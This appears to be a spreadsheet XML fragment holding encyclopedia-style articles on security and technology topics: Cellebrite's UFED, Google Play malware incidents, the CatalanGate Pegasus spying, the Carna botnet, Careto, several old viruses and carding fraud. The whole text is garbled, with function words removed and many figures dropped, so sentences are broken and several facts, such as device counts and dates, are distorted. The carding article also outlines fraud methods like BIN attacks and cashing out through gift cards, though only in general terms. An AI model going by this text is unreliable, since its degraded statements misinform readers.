    <t>ufed (universal forensics extraction device) product series israeli company cellebrite, used extraction analysis data mobile devices enforcement agencies. products cellebrite sells various products ufed series: ufed physical analyzer ufed logical analyzer ufed phone detective ufed cloud analyzer features ufed touch, possible select extraction data choose wide list vendors. after data extraction done, possible analyze data physical analyzer application.the cellebrite ufed physical analyzer supports following features: extract device keys used decrypt disk images, well keychain items. revealing device passwords, although available locked devices passcode recovery attacks analysis decoding application data generating reports various formats html dump filesystem analyzing applications history 2019, cellebrite announced version ufed, called ufed premium. company claimed unlock devices including running 12.3 android phones galaxy resale cellebrite allow resale products. original list price product around us$6000, sold ebay around us$100. some devices resold still contained data criminal investigations. security 2021, moxie marlinspike, creator encrypted messaging signal, released blog post app's website detailing number vulnerabilities cellebrite's ufed physical analyzer software allowed arbitrary code execution windows computers running software. exploit detailed involved ufed scanning specially formatted file could used execute arbitrary code computer running ufed. marlinspike wrote code could "[modify] cellebrite report created scan, also previous future generated cellebrite reports previously scanned devices future scanned devices arbitrary way". marlinspike also found cellebrite software bundled out-of-date ffmpeg files 2012, lacked subsequent security updates. windows installer packages, extracted windows installer itunes signed apple, also found, said raised legal concerns. cellebrite issued statement response, saying company committed protecting integrity customers’ data, continually audit update software order equip customers best digital intelligence solutions available." report signal followed announcement cellebrite 2020 developed technology crack encrypted messages signal app, claim company later retracted downplayed.the announcement marlinspike raised questions integrity data extracted software, prompted cellebrite patch vulnerabilities found signal remove full support analyzing iphones. also bootloader unlocking references external links official website</t>
  </si>
  <si>
    <t>CellForCash.com</t>
  </si>
  <si>
    <t>communications group, inc., business cellforcash.com, company bought used cellular handsets. cellforcash.com located ocala, florida. website allowed consumers business sell cellular phones cash. website listed cell phones company willing buy. users selected manufacturer model complete registration. company provided prepaid shipping label mailing.environmental research organization inform, inc., projected million cell phones retired 2005 u.s., estimated undiscarded phones approaching million.cellforcash.com shipped noncharity phones latin america high demand. retrieved recycled hundreds thousands unused phones since inception. ratings better business bureau rateed communications group, d.b.a. cellforcash.com, grade many complaints regarding legitimacy practices, noting number complaints filed them, failure respond complaints, seriousness many complaints. largest categories complaints "refund exchange issues" "contract issues". also electronic waste united states references external links cell cash</t>
  </si>
  <si>
    <t>INIT 1984</t>
  </si>
  <si>
    <t>init 1984 computer virus trigger macintosh computers running classic given friday 13th. virus first discovered isolated march, 1992. functions infecting startup (init) files triggers computer booted friday 13th. "damage includes changing names attributes large number folders files random strings deletion approximately files." virus threat assessment. references further reading ray, john; ray, william (may 2003). maximum security. sams. isbn 978-0-672-32381-2.</t>
  </si>
  <si>
    <t>Celeb Jihad</t>
  </si>
  <si>
    <t>celeb jihad website known sharing leaked private (often sexual) videos celebrities form jihad satire. daily beast describes "satirical celebrity gossip website."the website describes satirical website containing published rumors, speculation, assumptions, opinions, fiction well factual information". site lists owner "durka durka mohammad" fictitious terrorist whose goal "destroying poisonous celebrity culture" america.the website participated series releases images video, generally believed stolen hacked cell phones, dubbed "fappening 2.0". august 2017 released nude pictures lindsey vonn, tiger woods, miley cyrus, kristen stewart, katharine mcphee. image woods vonn, posted august suppressed apparent reaction legal threats august images carly booth deleted august november 2017 celeb jihad released naked images divas saraya-jade bevis, jojo offerman, maria kanellis, latest long series similar leaks celebrity images. website also released fake nude photos female celebrities, including doctored photos meghan markle, taylor swift, megan kate upton. also celebrity tape imagery nude celebrities icloud leaks celebrity photos references</t>
  </si>
  <si>
    <t>Google Play</t>
  </si>
  <si>
    <t>google play, also branded google play store formerly android market, digital distribution service operated developed google. serves official store certified devices running android operating system derivatives well chromeos, allowing users browse download applications developed android software development (sdk) published google. google play also served digital media store, offering music, books, movies, television programs. content purchased google play movies google play books accessed browser, android apps. applications available google play either free charge cost. they downloaded directly android device proprietary google play store mobile deploying application device google play website. applications utilizing hardware capabilities device targeted users devices specific hardware components, motion sensor (for motion-dependent games) front-facing camera (for online video calling). google play store billion downloads 2016 reached million apps published 2017, purge apps back million. subject multiple issues concerning security, malicious software approved uploaded store downloaded users, varying degrees severity. google play launched march 2012, bringing together android market, google music, google movies google ebookstore brand, marking shift google's digital distribution strategy. following re-branding, google expanded geographical support services. since 2018, google gradually sunsetted play brand: play newsstand rebranded google news 2018; play music discontinued favor youtube music 2020; play movies rebranded google 2021. 2022, play games expected shut mobile favor android emulator windows name. remaining standalone mobile play books. catalog content android applications 2017, google play featured million android applications. after google purged apps google play store, number apps risen back million android applications. 2017, developers locations could distribute apps google play, though every location supports merchant registration. developers receive application price, remaining goes distribution partner operating fees. developers sales, original price struck banner underneath informing users sale ends. google play allows developers release early versions apps select group users, alpha beta tests. users pre-order select apps well movies, music, books, games) items delivered soon available. some network carriers offer billing google play purchases, allowing users charges monthly phone bill rather credit cards. users request refunds within hours purchase. games google 2013 developer conference, google announced introduction google play games. google play games online gaming service android features real-time multiplayer gaming capabilities, cloud saves, social public leaderboards, achievements. standalone mobile launched july 2013. books google play books ebook digital distribution service. google play offers five million ebooks available purchase, users also upload 1,000 ebooks form epub file formats. january 2017, google play books available countries. movies shows google play movies video demand service offering movies television shows available purchase rental, depending availability.as january 2017, movies available countries, shows available australia, austria, canada, france, germany, japan, switzerland, united states united kingdom.in october 2020, google play movies renamed google google announced march 2022, google play remove play movies store moved google 2022. play pass september 2019, google launched google play pass games apps subscription service september 2019, subscribers could access games apps without in-app purchases. program invitation-only developers, integrate service existing apps. device updates google introduced project mainline android allowing core components updated google play store, without requiring complete system update.android supports updates core components including: security: media codecs, media framework components, resolver, conscrypt privacy: documents permission controller, extservices consistency: time zone data, angle (developers opt-in), module metadata, networking components, captive portal login, network permission configurationon december 2019, qualcomm announced snapdragon supports drivers updated google play store. this feature initially introduced android oreo vendors added support yet. teacher approved 2020, google launched children-focused 'teacher approved' section google play store. apps marked 'teacher approved' meet higher standards approved educational purposes. history google play (previously styled google play) originated three distinct products: android market, google music google ebookstore.android market announced google august 2008, made available users october december 2010, content filtering added android market, app's details page started showing promotional graphic top, maximum size raised megabytes megabytes. google ebookstore launched december 2010, debuting three million ebooks, making "the largest ebooks collection world". november 2011, google announced google music, section google play store offering music purchases. march 2012, google increased maximum allowed size allowing developers attach expansion files app's basic download; expansion file maximum size gigabytes, giving developers total gigabytes. also march 2012, android market re-branded google play.the google play store, including android apps, came chrome september 2016.in 2021, google play announced plans implement section privacy information applications storefront. project similar store's privacy labels expected released full first half 2022. feature show users kind information collects, whether data stores encrypted whether users tracked application. music google play music music podcast streaming service online music locker. features million songs, gives users free cloud storage 50,000 songs.as 2017, google play music available countries.in june 2018, google announced plans shut play music 2020 offered users migrate youtube music, migration google podcasts announced 2020. october 2020, music store google play music shutdown. google play music shut december 2020 replaced youtube music google podcasts. news publications magazines google play newsstand news aggregator digital newsstand service offering subscriptions digital magazines topical news feeds. google released newsstand november 2013, combining features google play magazines google currents single product.as january 2017, basic newsstand service, available worldwide. 2017, paid newsstand content available countries.on 2018, mobile merged google news weather form google news. newsstand section continued appear google play website november 2018, available google news app. devices until march 2015, google play "devices" section users purchase google nexus devices, chromebooks, chromecasts, google-branded hardware, accessories. separate online hardware retailer called google store introduced march 2015, replacing devices section google play. user interface apart searching content name, apps also searched keywords provided developer. when searching apps, users press suggested search filters, helping find apps matching determined filters. discoverability apps, google play store consists lists featuring apps category, including "top free", list popular free apps time; "top paid", list popular paid apps time; "top grossing", list apps generating highest amounts revenue; "trending apps", list apps recent installation growth; "top free", list popular free apps; "top paid", list popular paid apps; "featured", list apps selected google play team; "staff picks", frequently-updated list apps selected google play team; "editors' choice", list apps considered best time; "top developer", list apps made developers considered best. march 2017, google added "free week" section, offering normally-paid free. july 2017, google expanded "editors' choice" section feature curated lists apps deemed provide good android experiences within overall themes, fitness, video calling puzzle games.google play enables users know popularity apps, displaying number times downloaded. download count color-coded badge, special color designations surpassing certain download milestones, including grey 100, 500, 1,000 5,000 downloads, blue 10,000 50,000 downloads, green 100,000 500,000 downloads, red/orange million, million, million billion downloads.users submit reviews ratings apps digital content distributed google play, displayed publicly. ratings based 5-point scale. developers respond reviews using google play developer console. design google redesigned google play's interface several occasions. february 2011, google introduced website interface then-named android market provides access computer. applications purchased downloaded installed android device remotely, market account" section letting users give devices nickname easy recognition. 2011, google added application lists android market, including "top paid", "top free", "editor's choice", "top grossing", "top developers", "trending". july, google introduced interface focus featured content, search filters, book sales movie rentals. 2013, redesign website interface matched then-recently redesigned android app. july 2014, google play store android added headers books/movies sections, additional information screen offering list featuring latest available version, installed size, content rating, simplified permissions prompt overview categories. days later, redesign consistent then-new material design design language, updated october 2015 feature animations, divide content "apps games" "entertainment" sections, well added support languages read right-to-left. april 2016, google announced redesign icons used suite play apps, adding similar style consistent look. 2017, google removed shopping google play icon, triangle associated colors remaining. march 2018, google experimented changing format screenshots used pages webp format reverted change caused images load slowly. update also small tweaks google play store site reviews section opening dedicated page larger images light viewer. july 2022, google announced logo google play store uniform color google services. google play instant apps launched 2017, google play instant, also known google instant apps, allows user game without installing first. monetization google states developer policy center "google play supports variety monetization strategies benefit developers users, including paid distribution, in-app products, subscriptions, ad-based models", requires developers comply policies order "ensure best user experience". requires developers charging apps downloads google play must google play's payment system. in-app purchases unlocking additional functionality must also google play payment system, except cases purchase solely physical products" digital content consumed outside (e.g. songs played music players)." support paid applications introduced february 2009, developers united states united kingdom, support expanded additional countries september 2010. in-app billing system originally introduced march 2011. developers google play required feature physical address app's page google play, requirement established september 2014.in february 2017, google announced would developers sales apps, original price struck banner underneath informing users sale ends. google also announced made changes algorithms promote games based user engagement downloads. finally, announced editorial pages considers "optimal gaming experiences android", promoting curating games. payment methods google allows users purchase content credit debit cards, carrier billing, gift cards, paypal. google began rolling carrier billing purchases 2012, followed support paypal 2014. gift cards rumor google play gift cards started circulating online august 2012 references discovered android police 3.8.15 version update google play store android app. soon after, images gift cards started leak, august 2012, made official google rolled next weeks.as april 2017 google play gift cards available following countries: australia, austria, belgium, brazil, canada, denmark, finland, france, germany, greece, hong kong, india, indonesia, ireland, italy, japan, malaysia, mexico, netherlands, zealand, norway, poland, portugal, saudi arabia, singapore, south africa, south korea, spain, sweden, switzerland, thailand, turkey, united kingdom united states. subscriptions google introduced in-app subscriptions google play 2012. june 2016, sources reported google announced subscriptions charged google play would split revenue 85/15, developers receive revenue google takes 15%, change traditional 70/30 split years prior. move followed apple's then-recently announced change model, although commentators quick point apple grants 85/15 revenue share year active subscriptions, google's subscription change takes effect immediately. january 2018, transaction subscription products decreased subscribers developers retain paid months, establishing that, unlike sources reporting, google using model apple in-app subscriptions store. google play store android google play store, shortened play store home screen screen, google's official pre-installed store android-certified devices. provides access content google play, including apps, books, magazines, music, movies, television programs. devices ship google play store china, manufacturers offering alternative,.google play store filters list apps compatible user's device. developers target specific hardware components (such compass), software components (such widget), android versions (such nougat). carriers also certain apps installed users' devices, example tethering applications.there requirement android applications acquired using google play store. users download android applications developer's website third-party store alternative. google play store applications self-contained android package files (apk), similar .exe files install programs microsoft windows computers. android devices, "unknown sources" feature settings allows users bypass google play store install apks sources. depending developer preferences, apps installed phone's external storage card. installation history google play store features history installed apps. users remove apps list, changes also synchronizing google play website interface, option remove apps history exist. compatibility google publishes source code android "android open source project", allowing enthusiasts developers program distribute modified versions operating system. however, modified versions compatible apps developed google's official android versions. "android compatibility program" serves "define baseline implementation android compatible third-party apps written developers". only android devices comply google's compatibility requirements install access google play store application. stated help page android open source project, "devices "android compatible" participate android ecosystem, including android market; devices meet compatibility requirements exist outside ecosystem. words, android compatibility program separate "android compatible devices" devices merely derivatives source code. welcome uses android source code, android compatible devices—as defined tested android compatibility program—may participate android ecosystem."some device manufacturers choose store instead addition google play store. google play services 2012, google began decoupling certain aspects android operating system (particularly core applications) could updated google play store independently components, google play services, closed-source system-level process providing apis google services, installed automatically nearly devices running android "froyo" higher. with changes, google system functionality play services update apps without distribute upgrade operating system itself. result, android "jelly bean" contained relatively fewer user-facing changes, focusing minor changes platform improvements. history growth google play awards yearly lists april 2016, google announced google play awards, described recognize incredible developer community highlight best apps games". awards showcase five nominees across award categories, apps featured dedicated section google play. google stated "nominees selected panel experts google play team based criteria emphasizing quality, innovation, launch major update last months", winners announced may.google also previously released yearly lists apps deemed "best" google play.on march 2017, five years google play's launch, google released lists best-selling apps, games, movies, music, books past five years.in june 2017, google introduced "android excellence", editorial program highlight apps deemed highest quality google play editors.in 2020, google play awarded disney+ year users spongebob: krusty cook-off taking honors gaming category. application approval google places restrictions types apps published, particular allowing sexually explicit content, child endangerment, violence, bullying harassment, hate speech, gambling, illegal activities, requiring precautions user-generated content.in march 2015, google disclosed past months, begun using combination automated tools human reviewers check apps malware terms service violations published google play store. time, began rolling age-based ratings system apps games, based given region's official ratings authority (for example, esrb us).in october 2016, google announced detection filtering system designed provide "additional enhancements protect integrity store". system aimed detect filter cases developers attempting "manipulate placement apps illegitimate means like fraudulent installs, fake reviews, incentivized ratings".in april 2019, google announced changes store's review process, stating would take several days review submissions less-established developers. company later clarified that, exceptional cases, certain apps subject expanded review process, delaying publication seven days longer. application bans some mobile carriers block users installing certain apps. march 2009, reports surfaced several tethering apps banned store. however, apps later restored, preventing t-mobile subscribers downloading apps. google released statement: monday, several applications enable tethering removed android market catalog violation t-mobile's terms service based android's developer distribution agreement (section 7.2), remove applications android market catalog violate terms service carrier manufacturer. inadvertently unpublished applications carriers, today corrected problem android market users outside t-mobile network access applications. notified affected developers. april 2011, google removed grooveshark store unspecified policy violations. cnet noted removal came "after music labels accused service violating copyright law". techcrunch wrote approximately weeks later grooveshark returned android, "albeit official market", rather "playing android's ability install third-party applications browser, grooveshark taken responsibility distributing application themselves".in 2011, google banned account developer several video game emulators. neither google developer publicly revealed reason ban.in march 2013, google began pull blocking apps google play store, section developers' agreement, prohibits apps interfere servers services.apps exempt power management policies introduced android marshmallow without "adversely affected" them, banned.in july 2018, google banned additional categories apps, including perform cryptocurrency mining on-device, apps "facilitate sale explosives, firearms, ammunition, certain firearms accessories", used present ads, contain adult content aimed towards children, "multiple apps highly similar content user experience," "apps created automated tool, wizard service, based templates submitted google play operator service behalf persons." application security february 2012, google introduced automated antivirus system, called google bouncer, scan existing apps malware spyware trojan horses). 2017, bouncer feature safety measures within android platform rebranded umbrella name google play protect, system regularly scans apps threats.android apps require certain permissions device, including access body sensors, calendar, camera, contacts, location, microphone, phone, sms, storage, wi-fi, access google accounts.in july 2017, google described security effort called "peer grouping", apps performing similar functionalities, calculator apps, grouped together attributes compared. stands out, requesting device permissions others group, google's systems automatically flag security engineers take closer inspection. peer grouping based descriptions, metadata, statistics download count. security issues early march 2011, droiddream, trojan rootkit exploit, released then-named android market form several free applications were, many cases, pirated versions existing priced apps. this exploit allowed hackers steal information imei imsi numbers, phone model, user service provider. exploit also installed backdoor allowed hackers download code infected device. exploit affected devices running android versions earlier "gingerbread". google removed apps market immediately alerted, apps already downloaded 50,000 times, according android police's estimate. android police wrote method removing exploit infected device reset factory state, although community-developed solutions blocking aspects exploit created. days later, google confirmed malicious apps uploaded android market, downloaded 260,000 devices removed store. google emailed affected users information determine, information obtained device-specific (imei/imsi, unique codes used identify mobile devices, version android running device)" opposed personal data account information. also announced then-new "remote kill" functionality, alongside security update, lets google remotely remove malicious apps users' devices. however, days later, malicious version security update found internet, though contain specific droiddream malware. apps featuring malware, renamed droiddream light, surfaced following june, also removed store.at black security conference 2012, security firm trustwave demonstrated ability upload would circumvent bouncer blocker system. application used javascript exploit steal contacts, messages, photos, also capable making phone open arbitrary pages launch denial-of-service attacks. nicholas percoco, senior vice president trustwave's spiderlabs advanced security team, stated wanted test bounds capable of". stayed google play weeks, repeatedly scanned bouncer system without detection, percoco saying attack, malware attacker google play bypass bouncer". trustwave reached google share findings, noted manual testing apps might necessary detect apps using malware-masking techniques.according 2014 research study released riskiq, security services company, malicious apps introduced google play increased 388% 2011 2013, number apps removed google dropped 2011 2013. study revealed "apps personalizing android phones categories likely malicious". according world, "google said would need information riskiq's analysis comment findings."in october 2016, engadget reported blog post named "password storage sensitive apps" freelance android hacker sawyer, decided test privacy apps google play. testing applications, named "hide pictures keep safe vault" named "private photo vault", sawyer found significant errors password handling both, commented, "these companies selling products claim securely store intimate pieces data, snake oil. would near equal protection changing file extension renaming photos."in april 2017, security firm check point announced malware named "falseguide" hidden inside approximately "game guide" apps google play. malware capable gaining administrator access infected devices, receives additional modules show popup ads. malware, type botnet, also capable launching ddos attacks. after alerted malware, google removed instances store, time, approximately million android users already downloaded apps, oldest around since november 2016.in june 2017, researchers sophos security company announced finding apps using third-party development library shows intrusive advertisements users' phones. even apps force-closed user, advertisements remain. google removed apps receiving reports sophos, apps remained. when asked comment, google respond. august 2017, apps removed google play security firm lookout discovered apps contained allowed malicious advertising. apps collectively downloaded million times, consisted wide variety cases, including health, weather, photo-editing, internet radio emoji.in 2017, 700,000 apps banned google play abusive contents; increase number apps banned 2016.in march 2020, check point discovered apps containing malware program infected total million devices. program, called tekya, designed evade detection google play protect virustotal fraudulently click ads. around time, discovered least apps 700,000 total downloads containing least modifications program called android.circle.1. addition performing click fraud, android.circle.1 also operate adware perform phishing attacks.on july 2021, discovered malicious apps google play steal facebook users' logins passwords. their specialists uncovered trojans available google play store million installs among them. apps tricked victims logging facebook accounts hijacked credentials javascript code. google removed apps later on.on september 2021, zimperium zlabs recently discovered large-scale malware campaign infected million android devices countries likely stole hundreds millions victims subscribing paid services without knowledge. grifthorse, trojan used attacks, discovered researchers first spotted illicit global premium services campaign. this campaign active roughly five months, november 2020 april 2021, malicious apps last updated. malware delivered using trojanized android applications delivered google's official play store third-party stores. google removed apps notified malicious nature malware still available download third-party repositories.on november 2021, threatfabric, researchers explain discovered four different malware dropper campaigns distributing banking trojans google play store. this evolution includes creating small realistic-looking apps focus common themes fitness, cryptocurrency, codes, scanning trick users installing app. once "dropper" apps installed, silently communicate threat actor's server receive commands. when ready distribute banking trojan, threat actor's server tell installed perform fake "update" "drops" launches malware android device. patent issues some developers publishing google play sued patent infringement "patent trolls", people broad vaguely worded patents target small developers. developer manages successfully challenge initial assertion, "patent troll" changes claim violation order accuse developer violated different assertion patent. this situation continues case goes legal system, substantial economic costs, prompting developers settle. february 2013, austin meyer, flight simulator game developer, sued used copy-protection system app, system said "google gave and, course, google provides everyone else making game android!" meyer claimed google would assist lawsuit, stated would settle case. battle troll continued several years, uploading video june 2016 discussing sued uploading google play, "the patent troll apparently owns idea [sic] google play store itself". android authority wrote "this scenario played many developers many years", prompted discussions larger issue stake", developers stop making apps fear patent problems. availability users outside countries/regions listed access free apps games google play. also list mobile distribution platforms list most-downloaded google play applications references external links official website</t>
  </si>
  <si>
    <t>CatalanGate</t>
  </si>
  <si>
    <t>catalangate 2022 political scandal involving espionage, perpetrated mainly using group's pegasus spyware, figures catalan independence movement, basque independence movement. targets espionage included elected officials (including four presidents generalitat catalonia since 2010, presidents parliament catalonia, meps), activists, lawyers, computer scientists; cases, families main targets also targeted.the espionage uncovered citizen report published april 2022. report identified victims, consummated attempted. number targets exceeded previous cases espionage studied citizen lab, surpassing jazeera victims) salvador victims). citizen definitively attribute responsibility attacks particular perpetrator, however, went state circumstantial evidence strongly suggests perpetrator spanish government. term catalangate originates title citizen report. despite scandal's dissemination catalangate, also affected prominent basque pro-independence figures.according spanish defense officials puigdemont ex-president generalitat, puigdemont inner circle aware citizenlab's findings year pushed release findings (against wishes citizenlab sought gather additional evidence revealing findings) deflect attention puigdemont's ties russia putin well influence upcoming cjeu ruling regarding puigdemont's immunity. domain catalangate.cat registered òmnium cultural january 2022 months espionage scandal came known catalangate came light. background investigation spying conducted published citizen lab, canadian interdisciplinary laboratory, based munk school global affairs university toronto, focuses research, development, strategic policy high-level legal engagement confluence information communication technologies, human rights global security.previously 2019), citizen worked case involving pegasus infections exploited whatsapp security april 2019 enabled infiltration least 1,400 terminals. among people alerted problem president parliament, roger torrent, first jump media país guardian reported subject july 2020. case involved ernest maragall, anna gabriel -who exiled switzerland-, activist member jordi domingo, sergi miquel rodríquez, member carles puigdemont's team. basque leaders arnaldo otegi iñarritu also cited list people presumably subject secret scrutiny program.the investigation initiated jordi solé weeks replacing oriol junqueras member european parliament june 2020 suspected victim cell phone spying contacted security researcher elies campo, former whatsapp employee outspoken catalan independence supporter collaborates citizen lab. catalangate scandal collaboration potential victims citizen helped identify least people attacked infected spyware, pegasus candiru (two victims targeted using both). actual figure could higher citizen lab's tools developed systems and, spain, android devices predominate (80% total 2021). selection cases also analyzed amnesty international's tech lab, results independently validated forensic methodology used. virtually incidents correspond period 2017 2020 (although jordi sanchez suffered attempted infection 2015).in findings, citizen states "while attribute operation specific government entity time, circumstantial evidence shows strong link spanish government, especially given nature individuals targeted, timing attacks, fact spain listed client group". methods infiltration cases (and often case), attack carried intermediary: infecting, attempting infect, terminal family members people close target spied on.pegasus peculiarity case citizen discovery zero-click vulnerability, called homage, previously seen used group, effective versions prior 13.2.candiru citizen identified four victims espionage involving candiru. candiru spyware used infiltrate targets' personal computers. targets sent emails containing malicious links enticed click them, personal computers becoming infected candiru spyware clicked link. total seven emails identified. some emails appeared messages spanish governmental institution public health recommendations connection 2019 coronavirus epidemic. list victims with exception four people requested anonymity, list victims catalangate espionage case: reactions press coverage publication citizenlab's technical report, yorker published extensive report entitled "how democracies citizens" catalan case occupied seventh part) cover story. catalan government response april (one initial publication revelations), carles puigdemont oriol junqueras appeared european parliament denounce spying perpetrated upon pro-independence leaders, intervention joined popular unity candidacy, catalan national assembly, òmnium cultural. john-scott railton, citizen lab, also took part, detailing "circumstantial evidence": agencies linked structure spanish state would used pegasus candiru infiltrate cell phones victims political purposes. previous march, european parliament approved creation committee inquiry called committee investigate pegasus surveillance spyware alleged pegasus surveillance spyware journalists, politicians, security agents, diplomats, lawyers, businessmen, civil society actors citizens among countries, hungary poland, whether infringed european union fundamental rights. first meeting committee held puigdemont junqueras denounced spying. references</t>
  </si>
  <si>
    <t>Casino (computer virus)</t>
  </si>
  <si>
    <t>casino computer virus malicious virus upon running infected file, copies file allocation tables (fats) random-access memory (ram), deletes hard disk. challenges user game jackpot credits play with, hence name. matter lose, computer shuts down, thereby making reinstall dos. message shows challenges read(s): casino computer virus activates 15th january, april, august. popular culture 2021, virus featured virus, heartbreak world possibilities episode young sheldon. also comparison computer viruses sources "casino.2330". mcafee inc. retrieved june 2011. external links internet archive-hosted version virus</t>
  </si>
  <si>
    <t>Carna botnet</t>
  </si>
  <si>
    <t>carna botnet botnet 420,000 devices created anonymous hacker measure extent internet creator called “internet census 2012”. data collection data collected infiltrating internet devices, especially routers, used default password password all. named carna, "the roman goddess protection inner organs health".collected data compiled portrait display internet around world course hours. data gathered included ipv4 address space ipv6 address space.the carna botnet creator believes growing number ipv6 hosts internet, 2012 last time census like possible. results billion possible ipv4 addresses, carna botnet found total billion addresses use, including million behind firewall million returned reverse domain name system records. remaining billion ipv4 addresses probably used.an earlier first internet census usdhs lander-study counted million visible internet hosts 2006. further implications data provided carna botnet used security researcher morgan marquis-boire determine many countries finfisher spyware used. legally-gray data conduct open source analysis raised questions some, marquis-boire expressed belief data data. consider like rogue academia rather criminal activity," told wired magazine. number hosts level domain amongst other, carna botnet counted number hosts reverse names observed october 2012. level domains were: also bashlite mirai (malware) remaiten linux.darlloz linux.wifatch hajime (malware) references external links internet census 2012: port scanning using insecure embedded devices, carna botnet, june october 2012 data found github, bitbucket, sourceforge, internet archive.</t>
  </si>
  <si>
    <t>Careto (malware)</t>
  </si>
  <si>
    <t>careto (spanish slang "face"), sometimes called mask, piece espionage malware discovered kaspersky 2014. because high level sophistication professionalism, target list included diplomatic offices embassies, careto believed work nation state. kaspersky believes creators malware spanish-speaking.because focus spanish-speaking victims, heavy targeting morocco, targeting gibraltar, bruce schneier speculates careto operated spain. payload careto normally installs second complex backdoor program called sgh. easily modifiable also wider arsenal including ability intercept system events, file operations, performing wider range surveillance features. information gathered careto include encryption keys, virtual private network configurations, keys communication channels. detection removal careto hard discover remove stealth capabilities. addition, samples digitally signed. signatures issued bulgarian company, tecsystem ltd., authenticity company unknown. issued certificates valid june 2011 june 2013. another valid april 2013 july 2016, revoked verisign.careto discovered made attempts circumvent kaspersky security products. upon discovery careto trying exploit software, kaspersky started investigate further. part collecting statistics, multiple sinkholes placed command control servers.currently up-to-date antivirus software discover successfully remove malware. distribution investigation command control servers, discoveries showed victims infected. from information uncovered, victims infected malware clicking spear phishing link redirected websites software careto could exploit, adobe flash player. player since patched longer exploitable careto. websites contained exploitable software names similar popular newspapers, washington post independent. malware said multiple backdoors linux, windows. evidence possible fourth type backdoor android discovered servers, samples found. estimated careto compiled back 2007. known attacks ceased january 2014. references</t>
  </si>
  <si>
    <t>Google Public DNS</t>
  </si>
  <si>
    <t>google public domain name system (dns) service offered internet users worldwide google. functions recursive name server. google public announced december 2009, effort described "making faster secure". 2018, largest public service world, handling trillion queries day. google public related google cloud dns, hosting service. service google public service operates recursive name servers public following four addresses. addresses mapped nearest operational server anycast routing. service conventional name server software, bind, instead relying custom-designed implementation, conforming standards forth ietf. fully supports dnssec protocol since march 2013. previously, google public accepted forwarded dnssec-formatted messages perform validation.some providers practice hijacking processing queries, redirecting browsers advertisement site operated provider nonexistent domain name queried. google service correctly replies non-existent domain (nxdomain) response.the google service also addresses security. common attack vector interfere service achieve redirection pages legitimate malicious servers. google documents efforts resistant cache poisoning, including “kaminsky flaw” attacks well denial-of-service attacks. dns64 google public dns64 service operates recursive name servers public following addresses nat64. these servers compatible https. privacy google stated purposes performance security, querying address deleted 24–48 hours, internet service provider (isp) location information stored permanently servers. history december 2009, google public launched announcement official google blog product manager prem ramaswami, additional post google code blog.in january 2019, google public adopted protocol. dnssec launch google public dns, directly support dnssec. although rrsig records could queried, (authenticated data) flag launch version, meaning server unable validate signatures data. this upgraded january 2013, google's servers silently started providing dnssec validation information, client explicitly dnssec (do) flag query. this service requiring client-side flag replaced 2013 full dnssec validation default, meaning queries validated unless clients explicitly opt-out. client subnet since june 2014, google public automatically detects nameservers support edns client subnet (ecs) options defined ietf draft probing name servers rate queries caching capability), send queries options name servers automatically. censorship turkey march 2014, google public blocked turkey used circumvent blocking twitter, took effect march 2014 court order. block result earlier remarks prime minister tayyip erdogan vowed "wipe twitter" following damaging allegations corruption inner circle. method became popular determined simple domain name block used enforce ban, would easily bypassed using alternate resolver. activists distributed information service, spray-painted addresses used service graffiti buildings. following discovery method, google public blocked entirely. also https edns client subnet public recursive name server references external links official developers blog google public</t>
  </si>
  <si>
    <t>Carding (fraud)</t>
  </si>
  <si>
    <t>carding term describing trafficking unauthorized credit cards. stolen credit cards credit card numbers used prepaid gift cards cover tracks. activities also encompass exploitation personal data, money laundering techniques. modern carding sites described full-service commercial entities. acquisition there great many methods acquire credit card associated financial personal data. earliest known carding methods also included "trashing" financial data, raiding mail boxes working insiders. some bank card numbers semi-automatically generated based known sequences "bin attack". carders might attempt "distributed guessing attack" discover valid numbers submitting numbers across high number ecommerce sites simultaneously.today, various methodologies include skimmers atms, hacking skimming ecommerce payment processing site even intercepting card data within point sale network. randomly calling hotel room phones asking guests "confirm" credit card details example social engineering attack vector. resale stolen data bundled "base" "first-hand base" seller participated theft themselves. resellers "packs" dumps multiple sources. ultimately, data sold darknet markets carding sites forums specialising types illegal goods. teenagers gotten involved fraud using card details order pizzas.on sophisticated sites, individual "dumps" purchased code country avoid alerting banks misuse. automatic checker services perform validation masse order quickly check card blocked. sellers advertise dump's "valid rate", based estimates checker data. cards greater valid rate command higher prices. "cobs" changes billing highly valued, sufficient information captured allow redirection registered card's billing shipping addresses carder's control.full identity information sold "fullz" inclusive social security number, date birth address perform lucrative identity theft.fraudulent vendors referred "rippers", vendors take buyer's money never deliver. this increasingly mitigated forum store based feedback systems well strict site invitation referral policies.whilst carding forums exist dark web, today exist internet, many cloudflare network protection service.estimated card prices, us$, stolen payment card data 2015 cash funds stolen cards cashed buying pre-paid cards, gift cards reshipping goods mules e-fencing online marketplaces like ebay. increased enforcement scrutiny reshipping services rise dedicated criminal operations reshipping stolen goods.hacked computers configured socks proxy software optimise acceptance payment processors. money laundering 2004 investigation shadowcrew forum also investigations online payment service e-gold launched 1996, preferred money transfer systems carders time. december 2005 owner douglas jackson's house businesses raided part "operation goldwire". jackson discovered service become bank transfer system criminal underworld. pressured disclose ongoing records disclosed enforcement, many arrests made 2007. however, april 2007 jackson indicted money laundering, conspiracy operating unlicensed money transmitting business. this service freezing assets users "high risk" countries coming traditional financial regulation.since 2006, liberty reserve become popular service cybercriminals. when seized 2013 government, caused major disruption cybercrime ecosystem.today, carders prefer make payment bitcoin, well traditional wire services western union, moneygram russian webmoney service. related services many forums also provide related computer crime services phishing kits, malware spam lists. they also distribution point latest fraud tutorials either free commercially. point instant messenger choice anonymity well clients modified pgp. carding related sites hosted botnet based fast flux hosting resilience enforcement action.other account types like paypal, uber, netflix loyalty card points sold alongside card details. logins many sites also sold backdoor access apparently major institutions banks, universities even industrial control systems.for gift card fraud, retailers prone exploited fraudsters attempts steal gift cards technology stolen credit card information. context carding fraud, using stolen credit card data purchase gift cards becoming increasingly common money laundering tactic. another gift card fraud occurs retailer's online systems store gift card data undergo brute force attacks automated bots. refund fraud increasingly popular method using identify theft acquire prepaid cards ready immediate cash out. popular coupons counterfeited sold also.personal information even medical records sometimes available. theft gift card fraud operated entirely independently online carding operations.cashing gift cards common well, "discounted gift cards" found sale anywhere, making easy sale carder, lucrative operation.the google hacks popularly known google dorks credit card details also used vastly getting credit card details history 1980s–1999 since 1980s days dial-up bbses, term carding used describe practices surrounding credit card fraud. methods "trashing", raiding mail boxes working insiders stores cited effective ways acquiring card details. drops places like abandoned houses apartments persuadable neighbors near location suggested. social engineering mail order sales representatives suggested order provide passable information card present transactions. characters "the video vindicator" would write extensive guides "carding across america", burglary, fraud, supporting phreaking, advanced techniques maximizing profits. during 